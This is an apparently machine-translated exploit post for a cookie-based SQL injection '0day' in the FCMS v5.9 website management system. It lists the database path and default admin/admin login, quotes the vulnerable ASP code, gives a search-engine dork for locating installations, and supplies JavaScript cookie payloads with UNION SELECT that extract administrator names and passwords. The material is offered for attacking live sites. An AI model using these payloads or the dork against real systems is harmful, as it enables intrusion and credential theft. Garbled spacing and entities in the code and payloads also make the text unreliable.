Dream Flash website management system FCMS v5. 9 the latest vulnerability 0day
The database address: xmlEditor/database/####@@@datas.mdb
Background xmleditor/login. asp admin/admin
Message database: guestbook/db/sywl. asp
the cookie injected into the drain
Vulnerability file:
xml/text. asp
Vulnerability code:
<!–# include file=”…/conn. asp”–> //contains filtered get and post the file, but ignored the cookies
<%
flowNo = Request(“flowNo”) //Request get not only get and post Oh~~it!
if flowNo <> “” then //flowNo if it is not equal to null just to perform to you!
set rs=server. CreateObject(“ADODB. RecordSet”)
rs. Source=”select * from xmlContent where flowNo=”&flowNo
rs. Open rs. Source,conn,1,1
//the xml syntax, burst information will appear in the title inside~it!
Response. Write “<? xml version=‘1.0’ encoding=‘utf-8’?& gt;”&chr(1 3)
Response. Write “<main>” & chr(1 3)
Response. Write “<title><! [CDATA["
Response. Write rs(“tx”)
Response. Write "]]></title>”& chr(1 3)
Response. Write “<text><! [CDATA["
Response. Write rs(“description”)
Response. Write "]]></text>”& chr(1 3)
rs. Close
Set rs=nothing
conn. Close
Set conn=nothing
Response. Write “</main>”
end if
%>
Brief description: in fact, this cookie injection vulnerability in the root directory of the new. the asp file also exists, but the use of inconvenient, and a custom jump home==~to! However, in the text. asp this file inside hasn’t added anything to jump or the like, so the use of easy~!
Keywords: inurl:”xmleditor/login. asp”
EXP:
javascript:alert(document. cookie=”flowNo=”+escape(“1 4 union select 1,2,3,adminname from XmlAdmin”));
javascript:alert(document. cookie=”flowNo=”+escape(“1 4 union select 1,2,3,adminpwd from XmlAdmin”));
PS:note that this EXP exploits appear somewhere not in the page Oh, the page is blank, broke the account and password is appear in the title which is the title of~ it! Please carefully observe the Oh~it!
Sleep~!